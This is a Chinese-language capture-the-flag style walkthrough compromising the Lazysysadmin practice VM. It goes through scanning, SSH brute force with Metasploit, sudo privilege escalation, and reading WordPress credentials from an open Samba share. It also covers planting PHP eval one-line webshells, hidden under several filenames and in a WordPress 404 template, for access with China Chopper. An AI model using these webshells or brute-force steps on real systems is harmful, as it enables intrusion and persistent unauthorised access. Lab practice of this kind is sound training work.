lazysysadmin靶機練習

一、實驗環境1.靶機：Lazysysadmin

2.測試機：Kali

3.幫兇機：Windows 10

4.掃描工具：Nesssus

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

二，這裏我們分爲2種方式來實驗

1、用字典來爆破連接

2、用木馬來連接

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

2.1(第一種字典爆破)

（1）信息收集

查詢測試機ip地址，判斷所處網段

測試機所處網段 192.168.0.0

（2）主機發現

root@akemi:~# netdiscover -i eth0 -r 192.168.0.0/24

參數說明

-i 指定網卡名
-r 指定網段

（3）端口掃描（masscan/nmap）

root@akemi:~# masscan --rate=10000 --ports 0-65535 192.168.0.99

masscan掃描速度快，但準確度不高，可以多掃幾次，以防漏掃

或者使用nmap

root@akemi:~# nmap -sV -T4 -p 6667,22,139,445,80,3306 192.168.0.99

namp：-T4（分爲0-5等級；-sV（版本信息與開啓服務）；-A（詳細掃描開放的端口的具體服務）

與masscan相比，namp更詳細，但是速度較慢（可以先使用masscan掃描出端口，再用nmap詳細掃描開放的端口)

開啓了6667（ircd 互聯網中繼聊天守護進程），22（ssh服務），139、445（smaba共享服務），80（Apache服務），3306（MySQL）端口

（4）漏洞掃描

開啓nessusd服務，

如果沒有安裝點擊這裏

root@akemi:~# /etc/init.d/nessusd restart

登錄nessusd服務（本地的8834端口）

選擇“我的掃描”>>“新建掃描”

選擇“進階掃描”

（5）ssh爆破（22端口）

原理：靶機用戶存在弱口令漏洞，利用枚舉的方法破解目標主機ssh服務（使用Metasploit）

5.1)啓動msfconsole

5.2)搜索ssh_login的相關工具和攻擊負載

search ssh_login

5.3)啓用漏洞模塊，並查看需要的設置的相關項

use auxiliary/scanner/ssh/ssh_login

show options

5.4)設置目標主機的IP地址

set rhosts 192.168.0.99

5.5)設置登錄用戶的用戶文件(這裏我提前寫好文件了

set user_file /root/user.txt

5.6(設置暴力破解的密碼問價路徑

5.7)開始向目標主機爆破ssh的登錄賬號和密碼

exploit

5.8)遠程連接目標主機

ssh [email protected]

5.9）終極三問

whoami———>pwd———>uname -a

5.10）查詢/etc/passwd文件權限

ls -l /etc/passwd

/etc/passwd僅root擁有可讀可寫權限，togie只擁有可讀權限

5.11）查看當前用戶togie允許命令的權限信息

sudo -l

togie用戶在本機上允許命令的權限爲所有

groups

togie用戶所在組爲：sudo

5.12）提權（獲取root權限）

sudo su root

5.13）上傳後門文件（一句話木馬）

後門文件（一句話木馬），可以多放幾個在不同目錄（必須是在/var/www/html目錄下），使用不同文件名（隱藏深點）

也可以使用webacoo工具自動生成一句話木馬（webacoo -g -o 1.php）

<?php @eval($_POST[a])?>

5.14)啓用中國菜刀，獲取webshell權限（後門測試）

只要後門沒有被清除，都可以用菜刀爲所欲爲

二、web測試

1.通過瀏覽器訪問http://192.168.0.99 , 分析整個網頁發現沒啥東西

用默認目錄掃描工具(dirb），掃描對應網站的目錄

dirb 192.168.0.99

3、對掃描出來的目錄進行分析

掃描出來info.php文件，瀏覽器訪問,下圖可以看到目標存在信息泄露漏洞

4.掃描出來/phpmyadmin/目錄，瀏覽器訪問,可以看到是mysql的後臺登錄界面,嘗試弱口令或者暴力破解

5掃描發現wordpress ,瀏覽器訪問，發現其中含有疑似用戶名的信息

6嘗試登錄wordpress的默認後臺管理頁面wp-login.php

7.嘗試輸入一些簡單的弱口令,提示如下錯誤信息,發現用戶名是admin,此處存在用戶名名枚舉漏洞,然後嘗試暴力破解密碼

補充：

使用wpscan掃描http://192.168.0.99/wordpress 看是否含有漏洞
Vp 只枚舉有漏洞的插件，vt只枚舉存在漏洞的主題，tt列舉縮略圖相關的文件
因爲是WordPress博客的，所以可以使用wpsan進行漏洞掃描

wpscan --url http://192.168.0.99/wordpress -e vp,vt,tt

4、嘗試從samba服務發現漏洞

使用enum4linux枚舉運行samba的主機信息
enum4linux 192.168.106.140

掃描完成後發現存在共享目錄，允許空口令

可以遠程掛載，查看共享目錄,發現共享的是網站的根目錄

mount -t cifs -o username=’’,password=’’ //192.168.0.99/share$ /mnt

Cd到wordpress目錄,查看配置文件,可以看到wordpress後臺的用戶名以及密碼

或者在windows訪問共享

訪問方法：\\192.168.0.99\share$\wordpress

用得到用戶名與密碼嘗試登錄phpmyadmin,成功登錄進去

嘗試查看數據,發現此賬戶對數據庫沒有任何權限

嘗試用數據庫的用戶名密碼登錄wordpress後臺,成功登錄

可以在一個404頁面中添加一句話木馬留後門,上傳這個404頁面

<?php @eval($_POST[b]);?>

在瀏覽器訪問一個不存在的頁面,可以看到跳轉到404頁面,這時也就執行了插入其中的一句話木馬

打開菜刀工具,連接url, 成功反彈shell，經測試發現就下圖的菜刀可以連接成功，其餘菜刀不可以

總結

1.信息收集
判斷網段
主機發現
端口掃描
1.1漏洞掃描
1.2開啓nessusd服務，加載插件，登錄
1.3.建立掃描
1.4.掃描結果
2.dirb目錄爆破
默認字典目錄掃描
指定字典目錄掃描
3.ssh爆破（msfconsole）
4.wpscan掃描wordpress漏洞
5.文件共享信息泄露
6.進入後臺，Appearance頁面404.php掛馬，菜刀連接，反彈shell